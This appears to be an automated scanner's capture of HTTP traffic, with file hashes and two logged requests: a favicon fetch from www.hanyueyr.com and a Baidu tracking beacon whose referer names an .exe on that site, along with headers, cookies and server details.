Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __tins__18864699=%7B%22sid%22%3A%201559916458450%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201559918260724%7D; __51cke__=; __51laig__=4; __tins__18849991=%7B%22sid%22%3A%201559916458489%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201559918260740%7D; bdshare_firstime=1559916459841; Hm_lvt_d08ccb4fc69a8cc8f34331c26e3fbe5d=1559916461; Hm_lpvt_d08ccb4fc69a8cc8f34331c26e3fbe5d=1559916461

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.29


--- Additional Info ---
Magic:  UTF-8 Unicode text, with no line terminators
Size:   3
Md5:    ecaa88f7fa0bf610a5a26cf545dcd3aa
Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
                                            GET /v.gif?pid=307&type=3071&sc=1159,3908,1176,855&desturl=&apitype=1&linkid=jwm5zfp0uac&velo_load=0&velo_cssload=0&velo_jsLoad=819&cite_uid=0&cite_type=1&cite_mini=0 HTTP/1.1 
Host: nsclick.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe
Cookie: BAIDUID=FC1413AD38DC3A750CBF8113B67FF7BE:FG=1

                                         
                                         115.239.211.92
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Length: 0
Date: Fri, 07 Jun 2019 14:07:58 GMT
Etag: "4280832337"
Expires: Fri, 07 Jun 2019 14:07:58 GMT
Last-Modified: Fri, 23 Oct 2009 08:06:04 GMT
Pragma: no-cache
Server: BWS/1.0


--- Additional Info ---